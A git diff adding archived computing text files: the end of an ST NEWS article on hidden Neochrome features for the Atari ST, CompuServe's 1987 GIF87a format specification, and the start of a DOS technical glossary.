moves through the pattern + Key 4 : Palette 4, transparent block moves over graphics + + Have fun trying. It is easy to use some of your own color +palettes; some extremely funny effects can be created that way. + + This almost made an end to this issue's "Wizards" article. But +at the end I found it necessary to make a plea. No! Nothing like +"Tortured ST users everywhere get together!"; it is much more +about my favourite drawing program that I (and many others) think +is one of the most grotesquely underestimated programs on the ST. +I'm talking about "Neochrome" here, that was supplied with the +Atari ST in the early days (version 0.5). It was supposed to be +sold in the better version 1.0, but it was never properly +marketed. Most salesmen also considered 1.0 to be Public Domain +and that's why just about every ST user could get the program. + The reasons why the program is so gut will be explained to you +in just a little while, when I will tell you something about the +program that most of you probably didn't know. The basis is +actually brief: "Neochrome" already includes (almost) all +functions one would need for creating GOOD pictures; unnecessary +function are not present and it is fast, very FAST. It has +several function that would even make "Degas Elite" look rather +basic. + When you've drawn pictures yourself, you'll have to admit that +the most important tool of all is the zoom mode. On the contrary +to all other drawing programs that are available, "Neochrome" has +a zoom mode that is always present, also when you operate on +blocks, draw lines, fill, etc. This zoom mode is very fast, by +the way, because it uses raster interrupts. Further, the +'Jackknife' function allows you to cut out whatever form you want +(not just polygons), and these can also be moved in the +background ("DPaint II" on the Amiga can't even do that!). + I suppose you already know the functions that are implemented on +the "Neochrome" menu. So I will now talk about some function that +are not so obvious; you might be in for a surprise! Many things, +for example, are hidden in the right mouse button: In the +'normal' block menu, the current block is set on the current +position, but with 'Jackknife' you can DRAW with pressing the +right button, just like a brush (and, unlike other programs, this +also happens FAST)! While in 'brush' mode, pressing the right +mouse button takes care that you draw with the colors that have +been installed between the 'color arrows' - this is also the case +when using nozzles (highly effective when using color animation). + When you're in 'grabber' mode, you can get the color of every +pixel on the screen you want by pressing the right mouse button. +In 'line' mode, the current line is deleted when you press the +right button with the left one. When double-clicking the right +mouse button on the eraser icon, the entire screen is erased. + But now a very hot tip, since only few people know that there's +a complete animation tool in "Neochrome"! Dave Staugas, the +programmer, had no time to make it completely bug-free so that he +just hid it. This is the way to get the new icon on the screen: +Go to the 'grabber' mode and click with the right mouse button +precisely in the curve of the last 'R' in the word 'GRABBER' that +will appear on the right side of the menu. A small camera +appears! + You can now do the following after selecting that camera: You +can define an animation area with the mouse. With the right mouse +button you can now slide the whole picture through this area. +When you have the right part, you simply click on 'add' and the +part of the picture is in 'animation memory'. Add as many +pictures as you want, and then you slide the cutout back on the +first cutout (only Dave knows why) and you can use the arrows to +play the animation forwards as well as backwards. With 'Del', it +is possible to delete the current screen, and 'Load' and 'Save' +also work (just don't get startled when the fileselector box +that's busted - stop animation before!). Just experiment a little +with the animation tool; unlike all other animation tools for the +ST, this one's EASY to use. The biggest advantage is that you can +edit a figure that has to be animated right in the drawing +program. + But be warned: This new menu option is not bug free! It is for +example not quite smart to press the Undo key or make the menu +disappear while the camera is selected. So it's probably better +to save your picture before you enter the animation tool. When +you have the VERY OLD St demo with the flying parrot, you can +load it without problems. But do not forget to load the +accompanying picture before (the shore landscape) with regard to +the color palette. + + Finally, a little gag: You can define the colors in the menu +yourself! When started up, "Neochrome" looks for a file called +"NEO.CMP" in which 512 words with color values need to be that +will replace the preset palette. + When you intend to use "Neochrome" more often in the future, +look into your heart and give good ol' Dave something for his +trouble and his really good program. He is currently a system +programmer at Atari and quite disappointed about the fact that +his excellent program wasn't treated accordingly in the magazine +- and we're not even talking about the lousy marketing. Financial +contributions can be sent to: + +ATARI Corporation +Personal Mr. Dave Staugas +1196 Borregas Avenue +Sunnyvale, California 94088-3427 +U.S.A. + + If you're a "Neochrome" fan, do not falter! Dave wrote to me +that he will consider rewriting old source stuff and making a +better "Neochrome" version if the 'fanmail' is accordingly. I beg +you: Do so! + + Well, dear readers, again we have told you some of our tricks, +but the crown on our work of 'hardware-torturing' has yet to +come; we're hereby talking about getting rid of the lower border +so that graphics can be displayed there as well! Using this +trick, you will be able to effectively display more lines than +ever before anticipated by the developers of the ST. + Just wait for the next episode... + Bye, bye. + +The source listing referred to can be found on the relevant ST NEWS +disc, but you need K-SEKA to assemble the bloody thing! S.P + + + + + diff --git a/textfiles.com/computers/gifstd.txt b/textfiles.com/computers/gifstd.txt new file mode 100644 index 00000000..93adf09f --- /dev/null +++ b/textfiles.com/computers/gifstd.txt @@ -0,0 +1,712 @@ + + + + G I F (tm) + + Graphics Interchange Format (tm) + + + + + A standard defining a mechanism + for the storage and transmission + of raster-based graphics information + + + + + + + + + + + June 15, 1987 + + + + + + + + + + + + + (c) CompuServe Incorporated, 1987 + All rights reserved + + While this document is copyrighted, the information + contained within is made available for use in computer + software without royalties, or licensing restrictions. + + + + + + + GIF and 'Graphics Interchange Format' are trademarks of + CompuServe, Incorporated. + an H&R Block Company + + 5000 Arlington Centre Blvd. + Columbus, Ohio 43220 + (614) 457-8600 + Page 2 + + + Graphics Interchange Format (GIF) Specification + + + Table of Contents + + INTRODUCTION . . . . . . . . . . . . . . . . . page 3 + + GENERAL FILE FORMAT . . . . . . . . . . . . . page 3 + + GIF SIGNATURE . . . . . . . . . . . . . . . . page 4 + + SCREEN DESCRIPTOR . . . . . . . . . . . . . . page 4 + + GLOBAL COLOR MAP . . . . . . . . . . . . . . . page 5 + + IMAGE DESCRIPTOR . . . . . . . . . . . . . . . page 6 + + LOCAL COLOR MAP . . . . . . . . . . . . . . . page 7 + + RASTER DATA . . . . . . . . . . . . . . . . . page 7 + + GIF TERMINATOR . . . . . . . . . . . . . . . . page 8 + + GIF EXTENSION BLOCKS . . . . . . . . . . . . . page 8 + + APPENDIX A - GLOSSARY . . . . . . . . . . . . page 9 + + APPENDIX B - INTERACTIVE SEQUENCES . . . . . . page 10 + + APPENDIX C - IMAGE PACKAGING & COMPRESSION . . page 12 + + APPENDIX D - MULTIPLE IMAGE PROCESSING . . . . page 15 + Graphics Interchange Format (GIF) Page 3 +Specification + + +INTRODUCTION + + 'GIF' (tm) is CompuServe's standard for defining generalized color + raster images. This 'Graphics Interchange Format' (tm) allows + high-quality, high-resolution graphics to be displayed on a variety of + graphics hardware and is intended as an exchange and display mechanism + for graphics images. The image format described in this document is + designed to support current and future image technology and will in + addition serve as a basis for future CompuServe graphics products. + + The main focus of this document is to provide the technical + information necessary for a programmer to implement GIF encoders and + decoders. As such, some assumptions are made as to terminology relavent + to graphics and programming in general. + + The first section of this document describes the GIF data format + and its components and applies to all GIF decoders, either as standalone + programs or as part of a communications package. Appendix B is a + section relavent to decoders that are part of a communications software + package and describes the protocol requirements for entering and exiting + GIF mode, and responding to host interrogations. A glossary in Appendix + A defines some of the terminology used in this document. Appendix C + gives a detailed explanation of how the graphics image itself is + packaged as a series of data bytes. + + + Graphics Interchange Format Data Definition + + + GENERAL FILE FORMAT + + +-----------------------+ + | +-------------------+ | + | | GIF Signature | | + | +-------------------+ | + | +-------------------+ | + | | Screen Descriptor | | + | +-------------------+ | + | +-------------------+ | + | | Global Color Map | | + | +-------------------+ | + . . . . . . + | +-------------------+ | ---+ + | | Image Descriptor | | | + | +-------------------+ | | + | +-------------------+ | | + | | Local Color Map | | |- Repeated 1 to n times + | +-------------------+ | | + | +-------------------+ | | + | | Raster Data | | | + | +-------------------+ | ---+ + . . . . . . + |- GIF Terminator -| + +-----------------------+ + Graphics Interchange Format (GIF) Page 4 +Specification + + + GIF SIGNATURE + + The following GIF Signature identifies the data following as a + valid GIF image stream. It consists of the following six characters: + + G I F 8 7 a + + The last three characters '87a' may be viewed as a version number + for this particular GIF definition and will be used in general as a + reference in documents regarding GIF that address any version + dependencies. + + SCREEN DESCRIPTOR + + The Screen Descriptor describes the overall parameters for all GIF + images following. It defines the overall dimensions of the image space + or logical screen required, the existance of color mapping information, + background screen color, and color depth information. This information + is stored in a series of 8-bit bytes as described below. + + bits + 7 6 5 4 3 2 1 0 Byte # + +---------------+ + | | 1 + +-Screen Width -+ Raster width in pixels (LSB first) + | | 2 + +---------------+ + | | 3 + +-Screen Height-+ Raster height in pixels (LSB first) + | | 4 + +-+-----+-+-----+ M = 1, Global color map follows Descriptor + |M| cr |0|pixel| 5 cr+1 = # bits of color resolution + +-+-----+-+-----+ pixel+1 = # bits/pixel in image + | background | 6 background=Color index of screen background + +---------------+ (color is defined from the Global color + |0 0 0 0 0 0 0 0| 7 map or default map if none specified) + +---------------+ + + + The logical screen width and height can both be larger than the + physical display. How images larger than the physical display are + handled is implementation dependent and can take advantage of hardware + characteristics (e.g. Macintosh scrolling windows). Otherwise images + can be clipped to the edges of the display. + + The value of 'pixel' also defines the maximum number of colors + within an image. The range of values for 'pixel' is 0 to 7 which + represents 1 to 8 bits. This translates to a range of 2 (B & W) to 256 + colors. Bit 3 of word 5 is reserved for future definition and must be + zero. + Graphics Interchange Format (GIF) Page 5 +Specification + + + GLOBAL COLOR MAP + + The Global Color Map is optional but recommended for images where + accurate color rendition is desired. The existence of this color map is + indicated in the 'M' field of byte 5 of the Screen Descriptor. A color + map can also be associated with each image in a GIF file as described + later. However this global map will normally be used because of + hardware restrictions in equipment available today. In the individual + Image Descriptors the 'M' flag will normally be zero. If the Global + Color Map is present, it's definition immediately follows the Screen + Descriptor. The number of color map entries following a Screen + Descriptor is equal to 2**(# bits per pixel), where each entry consists + of three byte values representing the relative intensities of red, green + and blue respectively. The structure of the Color Map block is: + + bits + 7 6 5 4 3 2 1 0 Byte # + +---------------+ + | red intensity | 1 Red value for color index 0 + +---------------+ + |green intensity| 2 Green value for color index 0 + +---------------+ + | blue intensity| 3 Blue value for color index 0 + +---------------+ + | red intensity | 4 Red value for color index 1 + +---------------+ + |green intensity| 5 Green value for color index 1 + +---------------+ + | blue intensity| 6 Blue value for color index 1 + +---------------+ + : : (Continues for remaining colors) + + Each image pixel value received will be displayed according to its + closest match with an available color of the display based on this color + map. The color components represent a fractional intensity value from + none (0) to full (255). White would be represented as (255,255,255), + black as (0,0,0) and medium yellow as (180,180,0). For display, if the + device supports fewer than 8 bits per color component, the higher order + bits of each component are used. In the creation of a GIF color map + entry with hardware supporting fewer than 8 bits per component, the + component values for the hardware should be converted to the 8-bit + format with the following calculation: + + = *255/(2** -1) + + This assures accurate translation of colors for all displays. In + the cases of creating GIF images from hardware without color palette + capability, a fixed palette should be created based on the available + display colors for that hardware. If no Global Color Map is indicated, + a default color map is generated internally which maps each possible + incoming color index to the same hardware color index modulo where + is the number of available hardware colors. + Graphics Interchange Format (GIF) Page 6 +Specification + + + IMAGE DESCRIPTOR + + The Image Descriptor defines the actual placement and extents of + the following image within the space defined in the Screen Descriptor. + Also defined are flags to indicate the presence of a local color lookup + map, and to define the pixel display sequence. Each Image Descriptor is + introduced by an image separator character. The role of the Image + Separator is simply to provide a synchronization character to introduce + an Image Descriptor. This is desirable if a GIF file happens to contain + more than one image. This character is defined as 0x2C hex or ',' + (comma). When this character is encountered between images, the Image + Descriptor will follow immediately. + + Any characters encountered between the end of a previous image and + the image separator character are to be ignored. This allows future GIF + enhancements to be present in newer image formats and yet ignored safely + by older software decoders. + + + bits + 7 6 5 4 3 2 1 0 Byte # + +---------------+ + |0 0 1 0 1 1 0 0| 1 ',' - Image separator character + +---------------+ + | | 2 Start of image in pixels from the + +- Image Left -+ left side of the screen (LSB first) + | | 3 + +---------------+ + | | 4 + +- Image Top -+ Start of image in pixels from the + | | 5 top of the screen (LSB first) + +---------------+ + | | 6 + +- Image Width -+ Width of the image in pixels (LSB first) + | | 7 + +---------------+ + | | 8 + +- Image Height-+ Height of the image in pixels (LSB first) + | | 9 + +-+-+-+-+-+-----+ M=0 - Use global color map, ignore 'pixel' + |M|I|0|0|0|pixel| 10 M=1 - Local color map follows, use 'pixel' + +-+-+-+-+-+-----+ I=0 - Image formatted in Sequential order + I=1 - Image formatted in Interlaced order + pixel+1 - # bits per pixel for this image + + The specifications for the image position and size must be confined + to the dimensions defined by the Screen Descriptor. On the other hand + it is not necessary that the image fill the entire screen defined. + + + LOCAL COLOR MAP + Graphics Interchange Format (GIF) Page 7 +Specification + + + A Local Color Map is optional and defined here for future use. If + the 'M' bit of byte 10 of the Image Descriptor is set, then a color map + follows the Image Descriptor that applies only to the following image. + At the end of the image, the color map will revert to that defined after + the Screen Descriptor. Note that the 'pixel' field of byte 10 of the + Image Descriptor is used only if a Local Color Map is indicated. This + defines the parameters not only for the image pixel size, but determines + the number of color map entries that follow. The bits per pixel value + will also revert to the value specified in the Screen Descriptor when + processing of the image is complete. + + RASTER DATA + + The format of the actual image is defined as the series of pixel + color index values that make up the image. The pixels are stored left + to right sequentially for an image row. By default each image row is + written sequentially, top to bottom. In the case that the Interlace or + 'I' bit is set in byte 10 of the Image Descriptor then the row order of + the image display follows a four-pass process in which the image is + filled in by widely spaced rows. The first pass writes every 8th row, + starting with the top row of the image window. The second pass writes + every 8th row starting at the fifth row from the top. The third pass + writes every 4th row starting at the third row from the top. The fourth + pass completes the image, writing every other row, starting at the + second row from the top. A graphic description of this process follows: + + + Image + Row Pass 1 Pass 2 Pass 3 Pass 4 Result + --------------------------------------------------- + 0 **1a** **1a** + 1 **4a** **4a** + 2 **3a** **3a** + 3 **4b** **4b** + 4 **2a** **2a** + 5 **4c** **4c** + 6 **3b** **3b** + 7 **4d** **4d** + 8 **1b** **1b** + 9 **4e** **4e** + 10 **3c** **3c** + 11 **4f** **4f** + 12 **2b** **2b** + . . . + + + + The image pixel values are processed as a series of color indices + which map into the existing color map. The resulting color value from + the map is what is actually displayed. This series of pixel indices, + the number of which is equal to image-width*image-height pixels, are + passed to the GIF image data stream one value per pixel, compressed and + packaged according to a version of the LZW compression algorithm as + defined in Appendix C. + Graphics Interchange Format (GIF) Page 8 +Specification + + + GIF TERMINATOR + + In order to provide a synchronization for the termination of a GIF + image file, a GIF decoder will process the end of GIF mode when the + character 0x3B hex or ';' is found after an image has been processed. + By convention the decoding software will pause and wait for an action + indicating that the user is ready to continue. This may be a carriage + return entered at the keyboard or a mouse click. For interactive + applications this user action must be passed on to the host as a + carriage return character so that the host application can continue. + The decoding software will then typically leave graphics mode and resume + any previous process. + + + GIF EXTENSION BLOCKS + + To provide for orderly extension of the GIF definition, a mechanism + for defining the packaging of extensions within a GIF data stream is + necessary. Specific GIF extensions are to be defined and documented by + CompuServe in order to provide a controlled enhancement path. + + GIF Extension Blocks are packaged in a manner similar to that used + by the raster data though not compressed. The basic structure is: + + 7 6 5 4 3 2 1 0 Byte # + +---------------+ + |0 0 1 0 0 0 0 1| 1 '!' - GIF Extension Block Introducer + +---------------+ + | function code | 2 Extension function code (0 to 255) + +---------------+ ---+ + | byte count | | + +---------------+ | + : : +-- Repeated as many times as necessary + |func data bytes| | + : : | + +---------------+ ---+ + . . . . . . + +---------------+ + |0 0 0 0 0 0 0 0| zero byte count (terminates block) + +---------------+ + + A GIF Extension Block may immediately preceed any Image Descriptor + or occur before the GIF Terminator. + + All GIF decoders must be able to recognize the existence of GIF + Extension Blocks and read past them if unable to process the function + code. This ensures that older decoders will be able to process extended + GIF image files in the future, though without the additional + functionality. + Graphics Interchange Format (GIF) Page 9 +Appendix A - Glossary + + + GLOSSARY + +Pixel - The smallest picture element of a graphics image. This usually + corresponds to a single dot on a graphics screen. Image resolution is + typically given in units of pixels. For example a fairly standard + graphics screen format is one 320 pixels across and 200 pixels high. + Each pixel can appear as one of several colors depending on the + capabilities of the graphics hardware. + +Raster - A horizontal row of pixels representing one line of an image. A + typical method of working with images since most hardware is oriented to + work most efficiently in this manner. + +LSB - Least Significant Byte. Refers to a convention for two byte numeric + values in which the less significant byte of the value preceeds the more + significant byte. This convention is typical on many microcomputers. + +Color Map - The list of definitions of each color used in a GIF image. + These desired colors are converted to available colors through a table + which is derived by assigning an incoming color index (from the image) + to an output color index (of the hardware). While the color map + definitons are specified in a GIF image, the output pixel colors will + vary based on the hardware used and its ability to match the defined + color. + +Interlace - The method of displaying a GIF image in which multiple passes + are made, outputting raster lines spaced apart to provide a way of + visualizing the general content of an entire image before all of the + data has been processed. + +B Protocol - A CompuServe-developed error-correcting file transfer protocol + available in the public domain and implemented in CompuServe VIDTEX + products. This error checking mechanism will be used in transfers of + GIF images for interactive applications. + +LZW - A sophisticated data compression algorithm based on work done by + Lempel-Ziv & Welch which has the feature of very efficient one-pass + encoding and decoding. This allows the image to be decompressed and + displayed at the same time. The original article from which this + technique was adapted is: + + Terry A. Welch, "A Technique for High Performance Data + Compression", IEEE Computer, vol 17 no 6 (June 1984) + + This basic algorithm is also used in the public domain ARC file + compression utilities. The CompuServe adaptation of LZW for GIF is + described in Appendix C. + Graphics Interchange Format (GIF) Page 10 +Appendix B - Interactive Sequences + + + GIF Sequence Exchanges for an Interactive Environment + + + The following sequences are defined for use in mediating control + between a GIF sender and GIF receiver over an interactive communications + line. These sequences do not apply to applications that involve + downloading of static GIF files and are not considered part of a GIF + file. + + GIF CAPABILITIES ENQUIRY + + The GCE sequence is issued from a host and requests an interactive + GIF decoder to return a response message that defines the graphics + parameters for the decoder. This involves returning information about + available screen sizes, number of bits/color supported and the amount of + color detail supported. The escape sequence for the GCE is defined as: + + ESC [ > 0 g (g is lower case, spaces inserted for clarity) + (0x1B 0x5B 0x3E 0x30 0x67) + + + GIF CAPABILITIES RESPONSE + + The GIF Capabilities Response message is returned by an interactive + GIF decoder and defines the decoder's display capabilities for all + graphics modes that are supported by the software. Note that this can + also include graphics printers as well as a monitor screen. The general + format of this message is: + + + #version;protocol{;dev, width, height, color-bits, color-res}... + + '#' - GCR identifier character (Number Sign) + version - GIF format version number; initially '87a' + protocol='0' - No end-to-end protocol supported by decoder + Transfer as direct 8-bit data stream. + protocol='1' - Can use an error correction protocol to transfer GIF data + interactively from the host directly to the display. + + dev = '0' - Screen parameter set follows + dev = '1' - Printer parameter set follows + + width - Maximum supported display width in pixels + height - Maximum supported display height in pixels + color-bits - Number of bits per pixel supported. The number of + supported colors is therefore 2**color-bits. + color-res - Number of bits per color component supported in the + hardware color palette. If color-res is '0' then no + hardware palette table is available. + + + Note that all values in the GCR are returned as ASCII decimal + numbers and the message is terminated by a Carriage Return character. + Graphics Interchange Format (GIF) Page 11 +Appendix B - Interactive Sequences + + + The following GCR message describes three standard EGA + configurations with no printer; the GIF data stream can be processed + within an error correcting protocol: + + #87a;1 ;0,320,200,4,0 ;0,640,200,2,2 ;0,640,350,4,2 + + + ENTER GIF GRAPHICS MODE + + Two sequences are currently defined to invoke an interactive GIF + decoder into action. The only difference between them is that different + output media are selected. These sequences are: + + ESC [ > 1 g Display GIF image on screen + (0x1B 0x5B 0x3E 0x31 0x67) + + ESC [ > 2 g Display image directly to an attached graphics printer. + The image may optionally be displayed on the screen as + well. + (0x1B 0x5B 0x3E 0x32 0x67) + + Note that the 'g' character terminating each sequence is in lower + case. + + + INTERACTIVE ENVIRONMENT + + The assumed environment for the transmission of GIF image data from + an interactive application is a full 8-bit data stream from host to + micro. All 256 character codes must be transferrable. The establishing + of an 8-bit data path for communications will normally be taken care of + by the host application programs. It is however up to the receiving + communications programs supporting GIF to be able to receive and pass on + all 256 8-bit codes to the GIF decoder software. + Graphics Interchange Format (GIF) Page 12 +Appendix C - Image Packaging & Compression + + + The Raster Data stream that represents the actual output image can + be represented as: + + 7 6 5 4 3 2 1 0 + +---------------+ + | code size | + +---------------+ ---+ + |blok byte count| | + +---------------+ | + : : +-- Repeated as many times as necessary + | data bytes | | + : : | + +---------------+ ---+ + . . . . . . + +---------------+ + |0 0 0 0 0 0 0 0| zero byte count (terminates data stream) + +---------------+ + + The conversion of the image from a series of pixel values to a + transmitted or stored character stream involves several steps. In brief + these steps are: + + 1. Establish the Code Size - Define the number of bits needed to + represent the actual data. + + 2. Compress the Data - Compress the series of image pixels to a series + of compression codes. + + 3. Build a Series of Bytes - Take the set of compression codes and + convert to a string of 8-bit bytes. + + 4. Package the Bytes - Package sets of bytes into blocks preceeded by + character counts and output. + + + +ESTABLISH CODE SIZE + + The first byte of the GIF Raster Data stream is a value indicating + the minimum number of bits required to represent the set of actual pixel + values. Normally this will be the same as the number of color bits. + Because of some algorithmic constraints however, black & white images + which have one color bit must be indicated as having a code size of 2. + This code size value also implies that the compression codes must start + out one bit longer. + + +COMPRESSION + + The LZW algorithm converts a series of data values into a series of + codes which may be raw values or a code designating a series of values. + Using text characters as an analogy, the output code consists of a + character or a code representing a string of characters. + Graphics Interchange Format (GIF) Page 13 +Appendix C - Image Packaging & Compression + + + The LZW algorithm used in GIF matches algorithmically with the + standard LZW algorithm with the following differences: + + 1. A special Clear code is defined which resets all + compression/decompression parameters and tables to a start-up state. + The value of this code is 2**. For example if the code + size indicated was 4 (image was 4 bits/pixel) the Clear code value + would be 16 (10000 binary). The Clear code can appear at any point + in the image data stream and therefore requires the LZW algorithm to + process succeeding codes as if a new data stream was starting. + Encoders should output a Clear code as the first code of each image + data stream. + + 2. An End of Information code is defined that explicitly indicates the + end of the image data stream. LZW processing terminates when this + code is encountered. It must be the last code output by the encoder + for an image. The value of this code is +1. + + 3. The first available compression code value is +2. + + 4. The output codes are of variable length, starting at +1 + bits per code, up to 12 bits per code. This defines a maximum code + value of 4095 (hex FFF). Whenever the LZW code value would exceed + the current code length, the code length is increased by one. The + packing/unpacking of these codes must then be altered to reflect the + new code length. + + +BUILD 8-BIT BYTES + + Because the LZW compression used for GIF creates a series of + variable length codes, of between 3 and 12 bits each, these codes must + be reformed into a series of 8-bit bytes that will be the characters + actually stored or transmitted. This provides additional compression of + the image. The codes are formed into a stream of bits as if they were + packed right to left and then picked off 8 bits at a time to be output. + Assuming a character array of 8 bits per character and using 5 bit codes + to be packed, an example layout would be similar to: + + byte n byte 5 byte 4 byte 3 byte 2 byte 1 + +-.....-----+--------+--------+--------+--------+--------+ + | and so on |hhhhhggg|ggfffffe|eeeedddd|dcccccbb|bbbaaaaa| + +-.....-----+--------+--------+--------+--------+--------+ + + Note that the physical packing arrangement will change as the + number of bits per compression code change but the concept remains the + same. + +PACKAGE THE BYTES + + Once the bytes have been created, they are grouped into blocks for + output by preceeding each block of 0 to 255 bytes with a character count + byte. A block with a zero byte count terminates the Raster Data stream + for a given image. These blocks are what are actually output for the + Graphics Interchange Format (GIF) Page 14 +Appendix C - Image Packaging & Compression + + + GIF image. This block format has the side effect of allowing a decoding + program the ability to read past the actual image data if necessary by + reading block counts and then skipping over the data. + Graphics Interchange Format (GIF) Page 15 +Appendix D - Multiple Image Processing + + + Since a GIF data stream can contain multiple images, it is + necessary to describe processing and display of such a file. Because + the image descriptor allows for placement of the image within the + logical screen, it is possible to define a sequence of images that may + each be a partial screen, but in total fill the entire screen. The + guidelines for handling the multiple image situation are: + + 1. There is no pause between images. Each is processed immediately as + seen by the decoder. + + 2. Each image explicitly overwrites any image already on the screen + inside of its window. The only screen clears are at the beginning + and end of the GIF image process. See discussion on the GIF + terminator. + + diff --git a/textfiles.com/computers/glossary.lst b/textfiles.com/computers/glossary.lst new file mode 100644 index 00000000..d6af74d2 --- /dev/null +++ b/textfiles.com/computers/glossary.lst @@ -0,0 +1,945 @@ +GLOSSARY +Last Change 11/6/94. + +A20 + (Address line 20) The 80286 and higher CPUs allow addresses in +real mode to extend slightly beyond the one megabyte mark, which causes +an incompatibility with some older programs which expect such addresses +to wrap back to the beginning of the address space. For complete +compatibility with the 8088, newer machines thus contain circuitry +which permits the twenty-first address line (A20) to be disabled. The +CPU then effectively has only twenty address lines in real mode, just +as the 8088 does, and addresses which would extend beyond the one +megabyte mark wrap to the beginning of the address space. See also +High Memory Area, Real Mode. + +ABIOS + (Advanced BIOS) The IBM XT/286 and PS/2 models with 80286 or +higher processors contain two separate BIOSes. The ABIOS is a +protected-mode BIOS which is used by OS/2. For machines without an +ABIOS, such as the IBM AT, OS/2 loads the equivalent of the ABIOS from +disk. see also CBIOS + +API + (Application Program[ming] Interface) The defined set of calls +which a program may make to interact with or request services of the +operating system or environment under which it is running. Because the +inputs and outputs of the calls are well-defined, a program using the +API can continue using the identical calls even if the internal +organization of the program providing the API changes. + +APL + (A Programming Language) An interactive, mathematically- +oriented language which is well-suited to manipulating matrices. +Originally using greek letters and numerous special symbols, thus +requiring a special display, versions are now available which use +keywords in place of the special symbols. + +ASCIZ + A NUL-terminated ASCII string. The ASCIZ string "ABC" consists +of the four bytes 41h, 42h, 43h, and 00h. Unless otherwise specified, +maximum lengths given in the interrupt list do not include the +terminating NUL. + +AVATAR + (Advanced Video Attribute Terminal Assembler and Recreator) A +set of control codes which may be used to affect the output of +characters to the screen on systems equipped with an appropriate +driver. Similar in intent to ANSI sequences, AVATAR has shorter +command sequences and provides additional PC-specific functionality. +AVATAR is primarily used by the Opus and Maximus bulletin board systems +(it was designed by one of the developers of the Opus system). + +BASIC + (Beginner's All-purpose Symbolic Instruction Code) A +programming language originally designed as a means of teaching +FORTRAN. There are many variations of BASIC with differing +capabilities; the majority are interpreted but compiled BASIC is +becoming more popular. All genuine IBM personal computers (including +the latest PS/2 models) come equipped with a cassette-based BASIC +interpreter in ROM. + +BCD + (Binary Coded Decimal) A method of data storage where two +decimal digits are stored in each byte, one in the upper four bits and +the other in the lower four bits. Since only the values 0 through 9 +are used in each half of a byte, BCD values can be read as decimal +numbers on a hexadecimal display of memory or a file. + +Big-Endian + One of the two major ways of organizing multi-byte numeric +values in memory. A big-endian layout places the most significant byte +of the value in the lowest (first) memory location, i.e. 12345678h is +stored as 12h 34h 56h 78h. Motorola processors are big-endian. Compare +Little-Endian. + +BIOS + (Basic Input/Output System) A set of standardized calls giving +low-level access to the hardware. The BIOS is the lowest software +layer above the actual hardware and serves to insulate programs (and +operating systems) which use it from the details of accessing the +hardware directly. + +BIOS Parameter Block + The BIOS Parameter Block stores the low-level layout of a +drive. See also INT 21h Function 53h. + +Boot + To start up the computer or operating system. The term "boot" +is a contraction of "bootstrap", which in turn comes from the +expression "to lift oneself by one's boot straps." The ROM BIOS on IBM +PCs and compatibles reads in the first sector of the disk, which +contains a short (less than 500 bytes) program that reads in a portion +of the operating system, which in turn reads in the remainder of the +operating system. + +Boot Drive + The disk drive from which the operating system was booted. See +also Boot. + +BPB + see BIOS Parameter Block + +Breakpoint + When debugging, a memory location which when accessed causes a +break in the normal flow of execution and the invocation of the +debugger. Used to let a program run at full speed until a certain +instruction is reached or (less frequently) a particular data item is +accessed or changed. + +Cache + Caching is a method of increasing performance by keeping +frequently-used data in a location which is more quickly accessed. The +most common caches are disk caches (store disk sectors in RAM) and RAM +caches (store portions of main memory in special high-speed RAM which +may be accessed as fast as the CPU is capable of accessing memory). +See also Delayed Write, Write-Through. + +Callback + A call to a specified function made by the operating system or +operating environment when a request (usually an asynchronous request) +completes. This permits the calling program to continue operating while +the request is processed yet still be aware of its completion +immediately without the need to constantly poll the request's status. +See also Callout. + +Callout + A call made by the operating system, operating environment, or +an application program on various events, which may be intercepted by +other software which is interested in the current state of the system. +See also Callback, External Device Interface. + +CAS + see Communicating Applications Specification + +CBIOS + (Compatibility BIOS) The IBM XT/286 and PS/2 models with 80286 +or higher processors contain two separate BIOSes. The CBIOS is a +real-mode BIOS which is compatible with the earlier products in the IBM +PC family and PS/2 models with 8086 processors. See also ABIOS. + +CDS + see Current Directory Structure + +CGA + (Color/Graphics Adapter) One of the two video display boards +introduced together with the original IBM PC. See also HGC, MDA. + +Clock Tick + 1/18.2 second, or approximately 55 milliseconds. This is the +rate at which the IBM PC's system clock is updated. + +CMOS + (Complementary Metal-Oxide-Silicon) A type of integrated +circuit design known for its low power consumption. + +CMOS RAM + A small amount (typically 64 or 128 bytes) of memory in the system's +real-time clock chip that is preserved by the clock's battery and is used for +storing configuration information. See also Real-Time Clock. + +Communicating Applications Specification + DCA and Intel's standard programmatic interface for sending and +receiving FAXes via any of a number of internal FAX boards. + +CP/M + (Control Program for Microcomputers) An early operating system +for micros based on the 8-bit Intel 8080 CPU (and later the compatible +8085 and Zilog Z80 CPUs). MSDOS version 1.0 was essentially a clone of +CP/M for the Intel 8086. + +CP/M-86 + One of the three operating systems offered by IBM for its +original PC (the other two were MSDOS and the UCSD p-System). It has +since evolved into DR-DOS version 6. + +CPU + (Central Processing Unit) The microprocessor which executes +programs on your computer. + +Current Directory Structure + The data record used by DOS to keep track of the current +directory on a drive; whether the drive is valid, network, SUBSTituted, +or JOINed; and other pertinent information. See also INT 21h Function +52h. + +Cylinder + The set of concentric tracks of data located at the same +position on each data-bearing surface of the disk. A double-sided +floppy will contain two tracks per cylinder. + +DAC + (Digital-to-Analog Converter) A hardware device (in its simplest +form, nothing more than a set of interconnected resistors) which converts +a digital number into an analog signal whose voltage is proportional to +the value of the digital number. VGA and later color video boards use +DACs to convert color values into the analog signals sent to the display; +sound boards normally use DACs as well. + +DCC + (Display Combination Code) A number which indicates both the +type of display adapter board and the type of monitor attached to the +video board. + +Delayed Write + A form of caching in which control is returned before the data is +actually written to the storage media. See also Cache, Write-Through. + +Device Driver + An interface module between the device-independent portions of +the operating system and an actual hardware device which converts +device-independent requests into the actual sequence of device +operations to perform the requested action. IO.SYS contains the +standard, built-in MSDOS device drivers such as CON, COM1, AUX, PRN, +etc. See also INT 21h Function 52h and INT 2Fh Function 0802h. + +Device Driver Request Header + The data structure passed to a device driver which contains the +command to be executed, its parameters, and space for a returned status +and data values. See INT 2Fh Function 0802h. + +DGIS + (Direct Graphics Interface Standard) + +Direct Memory Access + A method whereby peripherals may transfer data into or out of +main memory without the involvement of the CPU. + +Disk Transfer Address + The Disk Transfer Address indicates where functions which do +not take an explicit data address will read or store data. Although +the name implies that only disk accesses use this address, other +functions use it as well. See INT 21h Function 4Eh for an example of +the DTA's use. + +DLL + see Dynamic Link Library + +DMA + see Direct Memory Access + +DOS Extender + A program which allows a program to run in protected mode while still +retaining access to real-mode MSDOS services. See also Protected Mode. + +DOS Parameter List + The DOS Parameter List is used to pass arguments to SHARE and +network functions. See also INT 21h Function 5D00h. + +DOS Protected-Mode Interface + An API which provides basic services for protected-mode 